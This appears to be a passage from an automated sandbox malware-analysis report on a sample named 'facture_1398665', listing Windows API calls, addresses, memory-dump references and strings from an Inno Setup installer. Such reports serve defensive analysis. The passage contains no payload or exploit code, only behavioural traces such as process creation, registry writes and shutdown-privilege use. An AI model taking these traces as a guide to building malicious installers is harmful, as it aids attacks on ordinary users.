      • Part of subcall function 004AD5D8: GetLastError.KERNEL32(00000000,004AD62E,?,?,?,?,?,?,?,?,?,?,004B6117,00000000,004B62D8), ref: 004AD610
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • GetObjectW.GDI32(00000000,00000054,?), ref: 004344C8
    • GetDC.USER32(00000000), ref: 004344D9
    • CreateCompatibleDC.GDI32(00000000), ref: 004344EA
    • CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 00434536
    • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0043455A
    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 004345AA
    • GetDeviceCaps.GDI32(00000000,0000000E), ref: 004345B7
    • SelectObject.GDI32(?,00000054), ref: 004346BF
      • Part of subcall function 004330E8: GetObjectW.GDI32(00000000,00000004), ref: 004330FF
      • Part of subcall function 004330E8: GetPaletteEntries.GDI32(00000000,00000000,?,00000028), ref: 00433122
    • SelectObject.GDI32(?,00000000), ref: 00434661
    • GetDIBColorTable.GDI32(?,00000000,00000100,-00000028), ref: 00434687
    • GetDIBits.GDI32(?,00000000,00000000,?,00000000,00000000,00000000), ref: 004346B2
    • CreateDIBSection.GDI32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00434715
    • GetDIBits.GDI32(?,00000000,00000000,?,00000000,00000000,00000000), ref: 00434776
      • Part of subcall function 004328A4: GetLastError.KERNEL32(00000000,00432940,?,00000000,?,00432958,00000000,00434B6B,00000000,00000000,00434D0B,?,00000000,00000054,?,00000000), ref: 004328C4
      • Part of subcall function 004328A4: FormatMessageW.KERNEL32(00001000,00000000,00000000,00000400,?,00000100,00000000,00000000,00432940,?,00000000,?,00432958,00000000,00434B6B,00000000), ref: 004328EA
    • SelectObject.GDI32(?,?), ref: 004347B7
    • SelectPalette.GDI32(?,00000000,00000000), ref: 004347F7
    • RealizePalette.GDI32(?), ref: 00434803
    • SelectPalette.GDI32(?,00000000,000000FF), ref: 00434A0E
      • Part of subcall function 0043170C: CreateBrushIndirect.GDI32(?), ref: 004317B7
    • FillRect.USER32(?,00434A14,00434A14), ref: 00434854
    • SetTextColor.GDI32(?,00000000), ref: 0043486C
    • SetBkColor.GDI32(?,00000000), ref: 00434886
    • SetDIBColorTable.GDI32(?,00000000,00000002,?), ref: 004348CE
    • PatBlt.GDI32(?,00000000,00000000,?,?,00FF0062), ref: 004348F0
    • CreateCompatibleDC.GDI32(00000000), ref: 00434903
    • SelectObject.GDI32(00434D0B,00000000), ref: 00434926
    • SelectPalette.GDI32(00434D0B,00000000,00000000), ref: 00434942
    • RealizePalette.GDI32(00434D0B), ref: 0043494D
    • DeleteDC.GDI32(00434D0B), ref: 004349E4
      • Part of subcall function 004306C0: GetSysColor.USER32(00432508), ref: 004306CA
    • SetTextColor.GDI32(00434D0B,00000000), ref: 0043496B
    • SetBkColor.GDI32(00434D0B,00000000), ref: 00434985
    • BitBlt.GDI32(?,00000000,00000000,?,?,00434D0B,00000000,00000000,00CC0020), ref: 004349AD
    • SelectPalette.GDI32(00434D0B,00000000,000000FF), ref: 004349BF
    • SelectObject.GDI32(00434D0B,00000000), ref: 004349C9
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • GetTickCount.KERNEL32(00000000,004B3973,?,?,01469C60,00000000,?,004B4372,?,01469C60,00000000), ref: 004B36E0
    • QueryPerformanceCounter.KERNEL32(01469C60,00000000,004B3973,?,?,01469C60,00000000,?,004B4372,?,01469C60,00000000), ref: 004B36E9
    • GetSystemTimeAsFileTime.KERNEL32(01469C60,01469C60,00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 004B36F3
    • GetCurrentProcessId.KERNEL32(?,01469C60,00000000,004B3973,?,?,01469C60,00000000,?,004B4372,?,01469C60,00000000), ref: 004B36FC
    • CreateNamedPipeW.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 004B3772
    • GetLastError.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 004B3780
    • CreateFileW.KERNEL32(00000000,C0000000,00000000,0050437C,00000003,00000000,00000000), ref: 004B37C8
    • SetNamedPipeHandleState.KERNEL32(000000FF,00000002,00000000,00000000,00000000,004B391E,?,00000000,C0000000,00000000,0050437C,00000003,00000000,00000000,00000000,004B392F), ref: 004B3801
      • Part of subcall function 0047F740: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0047F753
    • CreateProcessW.KERNEL32(00000000,00000000,?,00000000,00000000,000000FF,0C000000,00000000,00000000,00000044), ref: 004B38AA
    • CloseHandle.KERNEL32(000000FF), ref: 004B3918
      • Part of subcall function 004ADC34: GetLastError.KERNEL32(00000000,004AE8EE,00000005,00000000,004AE916,?,?,00000000,0050B17C,00000000,00000000,00000000,?,004FE26B,00000000,004FE286), ref: 004ADC37
    • CloseHandle.KERNEL32(?), ref: 004B38E0
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
      • Part of subcall function 0047F17C: GetCommandLineW.KERNEL32(00000000,0047F1BE,?,00000000,00000000,?,004E2AD9,-00000010,?,00000004,0000001C,00000000,004E2CF7,?,004B9C20,00000000), ref: 0047F192
      • Part of subcall function 004DE8AC: CreateDirectoryW.KERNEL32(00000000,00000000,00000000,004DE9FE,?,0050B17C,00000005,00000000,00000000,?,004FE411,00000000,004FE5C9,?,00000000,004FE639), ref: 004DE937
      • Part of subcall function 004DE8AC: GetLastError.KERNEL32(00000000,00000000,00000000,004DE9FE,?,0050B17C,00000005,00000000,00000000,?,004FE411,00000000,004FE5C9,?,00000000,004FE639), ref: 004DE940
    • Sleep.KERNEL32(0000000A,00000002,00000001,00000031,00000000,004FD164,?,00000000,004FD231,?,00000006,?,00000000,004FD285,?,00000000), ref: 004FCEF1
      • Part of subcall function 00480A80: GetModuleHandleW.KERNEL32(user32.dll,ShutdownBlockReasonCreate,?,00000001,00000000,004E2A27,-00000010,?,00000004,0000001C,00000000,004E2CF7,?,004B9C20,00000000,004E2D5F), ref: 00480A98
      • Part of subcall function 00480A80: ShutdownBlockReasonCreate.USER32(?,00000000,00000000,user32.dll,ShutdownBlockReasonCreate,?,00000001,00000000,004E2A27,-00000010,?,00000004,0000001C,00000000,004E2CF7), ref: 00480AB2
    • GetTickCount.KERNEL32(0000000A,00000002,00000001,00000031,00000000,004FD164,?,00000000,004FD231,?,00000006,?,00000000,004FD285,?,00000000), ref: 004FCF49
      • Part of subcall function 004B6D74: SHChangeNotify.SHELL32(00000010,00000005,?,00000000), ref: 004B7602
      • Part of subcall function 004B6D74: RegSetValueExW.ADVAPI32(005043A4,0000001B,00000000,00000001,005043A4,00000002,?,00000002,00000000), ref: 004B7829
      • Part of subcall function 004B6D74: RegCloseKey.ADVAPI32(005043A4,005043A4,0000001B,00000000,00000001,005043A4,00000002,?,00000002,00000000), ref: 004B783D
      • Part of subcall function 004B6D74: RegDeleteValueW.ADVAPI32(005043A4,0000001B,005043A4,00000003,00000000,005043A4,005043A4,0000001B,00000000,00000001,005043A4,00000002,?,00000002,00000000), ref: 004B78FA
      • Part of subcall function 004B6D74: RegCloseKey.ADVAPI32(005043A4,005043A4,00000003,00000000,005043A4,005043A4,0000001B,00000000,00000001,005043A4,00000002,?,00000002,00000000), ref: 004B790E
      • Part of subcall function 004B6D74: SHChangeNotify.SHELL32(08000000,00000000,00000000,00000000), ref: 004B79FE
      • Part of subcall function 004B6D74: SHChangeNotify.SHELL32(00001000,00001005,00000000,00000000), ref: 004B7A9B
    • GetTickCount.KERNEL32(0000000A,00000002,00000001,00000031,00000000,004FD164,?,00000000,004FD231,?,00000006,?,00000000,004FD285,?,00000000), ref: 004FD085
    • MsgWaitForMultipleObjects.USER32(00000000,00000000,00000000,0000000A,000000FF), ref: 004FD0A1
      • Part of subcall function 00480B10: GetModuleHandleW.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,00000000,00480A8E,?,00000001,00000000,004E2A27,-00000010,?,00000004,0000001C,00000000,004E2CF7), ref: 00480B1E
      • Part of subcall function 00480B10: ShutdownBlockReasonDestroy.USER32(?,00000000,user32.dll,ShutdownBlockReasonDestroy,?,00000000,00480A8E,?,00000001,00000000,004E2A27,-00000010,?,00000004,0000001C,00000000), ref: 00480B30
      • Part of subcall function 004DE288: SHGetKnownFolderPath.SHELL32(005045A0,00008000,00000000,?), ref: 004DE467
      • Part of subcall function 004DE288: CoTaskMemFree.OLE32(?), ref: 004DE49D
      • Part of subcall function 004DE288: SHGetKnownFolderPath.SHELL32(005045B0,00008000,00000000,?), ref: 004DE4BA
      • Part of subcall function 004DE288: CoTaskMemFree.OLE32(?), ref: 004DE4F0
      • Part of subcall function 004B1EA0: SendMessageW.USER32(00000000,00000B06,00000000,00000000), ref: 004B1EBA
      • Part of subcall function 004B1EA0: SendMessageW.USER32(00000000,00000B00,00000000,00000000), ref: 004B1F57
      • Part of subcall function 004E06F4: GetWindowLongW.USER32(?,000000EC), ref: 004E0710
      • Part of subcall function 004E06F4: SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097), ref: 004E073F
      • Part of subcall function 004E06F4: GetWindowLongW.USER32(?,000000EC), ref: 004E0754
      • Part of subcall function 004E06F4: SetWindowLongW.USER32(?,000000EC,00000000), ref: 004E077A
      • Part of subcall function 004E06F4: ShowWindow.USER32(?,00000005), ref: 004E0793
      • Part of subcall function 004E06F4: SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000057), ref: 004E07B4
    Strings
    • Uninstall command line: , xrefs: 004FCB56
    • UninstallNeedRestart, xrefs: 004FCFC7, 004FD002
    • Uninstall DAT: , xrefs: 004FCB36
    • Setup version: Inno Setup version 5.5.9 (u), xrefs: 004FCB08
    • Install was done in 64-bit mode but not running 64-bit Windows now, xrefs: 004FCCC6
    • Cannot find utCompiledCode record for this version of the uninstaller, xrefs: 004FCC81
    • tCP, xrefs: 004FCF74, 004FD051
    • Uninstall, xrefs: 004FCABB
    • Need to restart Windows? %s, xrefs: 004FD066
    • Original Uninstall EXE: , xrefs: 004FCB1B
    • DeinitializeUninstall, xrefs: 004FD1F1
    • Not calling UninstallNeedRestart because a restart has already been deemed necessary., xrefs: 004FD043
    • Removed all? %s, xrefs: 004FCF89
    • Will not restart Windows automatically., xrefs: 004FD147
    • Will restart because UninstallNeedRestart returned True., xrefs: 004FD014
    • InitializeUninstall, xrefs: 004FCE35
    • InitializeUninstall returned False; aborting., xrefs: 004FCE68
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • GetModuleHandleW.KERNEL32(kernel32.dll,0040B314,00400000,005027F0), ref: 00408191
    • GetProcAddress.KERNEL32(?,GetLongPathNameW,kernel32.dll,0040B314,00400000,005027F0), ref: 004081A8
    • lstrcpynW.KERNEL32(?,?,?), ref: 004081D8
    • lstrcpynW.KERNEL32(?,?,?,kernel32.dll,0040B314,00400000,005027F0), ref: 00408247
      • Part of subcall function 00408150: CharNextW.USER32(?), ref: 00408157
    • lstrcpynW.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,0040B314,00400000,005027F0), ref: 0040828F
    • FindFirstFileW.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,0040B314,00400000,005027F0), ref: 004082A2
    • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,0040B314,00400000,005027F0), ref: 004082B8
    • lstrlenW.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,0040B314,00400000,005027F0), ref: 004082C4
    • lstrcpynW.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,0040B314,00400000), ref: 00408300
    • lstrlenW.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,0040B314), ref: 0040830C
    • lstrcpynW.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 0040832F
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • GetVersion.KERNEL32 ref: 004B8A93
    • GetModuleHandleW.KERNEL32(advapi32.dll), ref: 004B8AB4
    • GetProcAddress.KERNEL32(00000000,GetNamedSecurityInfoW,advapi32.dll), ref: 004B8AC1
    • GetProcAddress.KERNEL32(00000000,SetNamedSecurityInfoW,00000000,GetNamedSecurityInfoW,advapi32.dll), ref: 004B8ACE
    • GetProcAddress.KERNEL32(00000000,SetEntriesInAclW,00000000,SetNamedSecurityInfoW,00000000,GetNamedSecurityInfoW,advapi32.dll), ref: 004B8ADC
    • AllocateAndInitializeSid.ADVAPI32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,004B8CB3), ref: 004B8B7C
    • GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,004B8CB3), ref: 004B8B85
    • LocalFree.KERNEL32(?,004B8C60), ref: 004B8C53
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
      • Part of subcall function 004D8D84: GetModuleHandleW.KERNEL32(kernel32.dll,GetFinalPathNameByHandleW), ref: 004D8DB0
      • Part of subcall function 004D8D84: GetFileAttributesW.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleW), ref: 004D8DC9
      • Part of subcall function 004D8D84: CreateFileW.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000), ref: 004D8DF3
      • Part of subcall function 004D8D84: CloseHandle.KERNEL32(00000000), ref: 004D8E11
      • Part of subcall function 004D8E94: GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,004D8F27,?,00000000,0148B69C,?,004D8F9F,00000000,004D90B7,?,?,?), ref: 004D8EC3
    • ShellExecuteExW.SHELL32(0000003C), ref: 004D8FEF
    • GetLastError.KERNEL32(00000000,004D90B7,?,?,?), ref: 004D8FF8
    • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 004D9045
    • GetExitCodeProcess.KERNEL32(00000000,?), ref: 004D906B
    • CloseHandle.KERNEL32(00000000), ref: 004D908F
      • Part of subcall function 004ADC34: GetLastError.KERNEL32(00000000,004AE8EE,00000005,00000000,004AE916,?,?,00000000,0050B17C,00000000,00000000,00000000,?,004FE26B,00000000,004FE286), ref: 004ADC37
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • IsIconic.USER32(?), ref: 00463DD7
    • GetWindowPlacement.USER32(?,?), ref: 00463DF4
    • GetWindowRect.USER32(?,?), ref: 00463E13
    • GetWindowLongW.USER32(?,000000F0), ref: 00463E21
    • GetWindowLongW.USER32(?,000000F8), ref: 00463E3A
    • GetWindowLongW.USER32(00000000,000000EC), ref: 00463E48
    • ScreenToClient.USER32(00000000), ref: 00463E78
    • ScreenToClient.USER32(00000000), ref: 00463E9D
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • FindFirstFileW.KERNEL32(00000000,?,00000000,004FE07B,?,00000000,0050B17C,?,004FE232,00000000,004FE286,?,00000000,00000000,00000000), ref: 004FDF89
    • SetFileAttributesW.KERNEL32(00000000,00000010), ref: 004FE00C
    • DeleteFileW.KERNEL32(00000000), ref: 004FE01A
    • FindNextFileW.KERNEL32(000000FF,?,00000000,004FE04E,?,00000000,?,00000000,004FE07B,?,00000000,0050B17C,?,004FE232,00000000,004FE286), ref: 004FE02A
    • FindClose.KERNEL32(000000FF,004FE055,004FE04E,?,00000000,?,00000000,004FE07B,?,00000000,0050B17C,?,004FE232,00000000,004FE286), ref: 004FE048
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • GetCurrentProcess.KERNEL32(00000028), ref: 004B00BC
    • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 004B00C2
    • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 004B00DB
    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 004B0102
    • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 004B0107
    • ExitWindowsEx.USER32(00000002,00000000), ref: 004B0118
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • DefWindowProcW.USER32(?,?,?,?), ref: 00453B04
      • Part of subcall function 00452604: SendMessageW.USER32(?,00000234,00000000,00000000), ref: 0045268A
      • Part of subcall function 00452604: DrawMenuBar.USER32(00000000), ref: 0045269B
    • GetSubMenu.USER32(?,?), ref: 004536CC
      • Part of subcall function 00431848: InitializeCriticalSection.KERNEL32(00433F14,00433ED8,00000000,00000001,0043406E,00000000,?,00000000,00435659), ref: 00431868
    • SaveDC.GDI32(?), ref: 004538A0
    • RestoreDC.GDI32(?,?), ref: 00453914
    • GetWindowDC.USER32(?), ref: 0045398E
    • SaveDC.GDI32(?), ref: 004539C5
    • RestoreDC.GDI32(?,?), ref: 00453A50
      • Part of subcall function 004531AC: GetMenuItemCount.USER32(?), ref: 004531D8
      • Part of subcall function 004531AC: GetMenuState.USER32(?,00000000,00000400), ref: 004531F8
      • Part of subcall function 004531AC: GetMenuState.USER32(?,00000000,00000400), ref: 00453290
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • IsIconic.USER32(?), ref: 00481265
    • GetWindowLongW.USER32(?,000000F0), ref: 0048127E
    • GetWindowLongW.USER32(?,000000EC), ref: 0048129A
    • GetActiveWindow.USER32 ref: 004812A3
      • Part of subcall function 00470BFC: GetCurrentThreadId.KERNEL32(00470BAC,00000000,00000000,00470C70,?,00000000,00470CAE,?,00480F48,?,00000001), ref: 00470C53
      • Part of subcall function 00470BFC: EnumThreadWindows.USER32(00000000,00470BAC,00000000), ref: 00470C59
    • MessageBoxW.USER32(00000000,00000000,00000000,00000000), ref: 004812D0
      • Part of subcall function 00470CC0: IsWindow.USER32(?), ref: 00470CCE
      • Part of subcall function 00470CC0: EnableWindow.USER32(?,000000FF), ref: 00470CDD
    • SetActiveWindow.USER32(?), ref: 004812F1
      • Part of subcall function 0047C868: GetWindowRect.USER32(?,?), ref: 0047C8F3
      • Part of subcall function 0047C868: SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D), ref: 0047C92E
      • Part of subcall function 0047C868: MessageBoxW.USER32(00000000,00000000,00000000,00000000), ref: 0047C96D
      • Part of subcall function 0047C868: SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D), ref: 0047C9C0
      • Part of subcall function 0047C868: SetActiveWindow.USER32(00000000), ref: 0047C9D1
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • FindFirstFileW.KERNEL32(00000000,?,00000000,004D50FD,?,0050BE1C,00000000), ref: 004D4F98
    • FindNextFileW.KERNEL32(00000000,?,00000000,?,00000000,004D50FD,?,0050BE1C,00000000), ref: 004D50C4
    • FindClose.KERNEL32(00000000,00000000,?,00000000,?,00000000,004D50FD,?,0050BE1C,00000000), ref: 004D50D2
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • MonitorFromWindow.USER32(?,?), ref: 0042DBFC
    • IsIconic.USER32(?), ref: 0042DC15
    • GetWindowPlacement.USER32(?,?), ref: 0042DC23
    • GetWindowRect.USER32(?,?), ref: 0042DC2F
      • Part of subcall function 0042DB28: GetSystemMetrics.USER32(00000000), ref: 0042DB79
      • Part of subcall function 0042DB28: GetSystemMetrics.USER32(00000001), ref: 0042DB85
      • Part of subcall function 0042D96C: GetProcAddress.KERNEL32(766C0000,00000000,00000000,0042DA4E), ref: 0042DA08
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
